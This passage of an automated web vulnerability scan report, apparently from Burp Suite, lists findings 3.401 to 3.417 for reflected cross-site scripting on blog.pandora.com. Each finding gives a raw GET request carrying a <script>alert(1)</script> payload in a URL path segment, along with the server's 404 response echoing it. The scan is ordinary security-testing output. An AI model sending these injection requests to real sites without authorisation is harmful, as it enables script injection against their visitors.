Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ was not found on this server.</p>
...[SNIP]...

3.401. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/pennsylvania/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)</script>c2d02fb7876 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ was not found on this server.</p>
...[SNIP]...

3.402. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/pennsylvania/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)</script>2be1e057475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ was not found on this server.</p>
...[SNIP]...

3.403. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/play-listen-repeat/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)</script>859bfd370e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 360
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...

3.404. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/play-listen-repeat/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)</script>75e75ebb353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...

3.405. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/play-listen-repeat/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)</script>9cecf728f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ was not found on this server.</p>
...[SNIP]...

3.406. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/rhode-island/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)</script>b6acfa54d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ was not found on this server.</p>
...[SNIP]...

3.407. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/rhode-island/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)</script>e386b3405c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ was not found on this server.</p>
...[SNIP]...

3.408. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/rhode-island/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)</script>066ab1d13fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ was not found on this server.</p>
...[SNIP]...

3.409. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)</script>94fa79588e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ was not found on this server.</p>
...[SNIP]...

3.410. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)</script>102c29e82d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ was not found on this server.</p>
...[SNIP]...

3.411. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)</script>a59406e84d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ was not found on this server.</p>
...[SNIP]...

3.412. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)</script>402d0eee6e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html was not found on this server.</p>
...[SNIP]...

3.413. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)</script>06bc8e10aef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html was not found on this server.</p>
...[SNIP]...

3.414. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)</script>fbd7c19bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 359

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html was not found on this server.</p>
...[SNIP]...

3.415. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)</script>1df9109ab61 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 was not found on this server.</p>
...[SNIP]...

3.416. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/south-daktoa/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)</script>0b81ccc9992 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ was not found on this server.</p>
...[SNIP]...

3.417. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/south-daktoa/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)</script>c6bfcd2ec61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
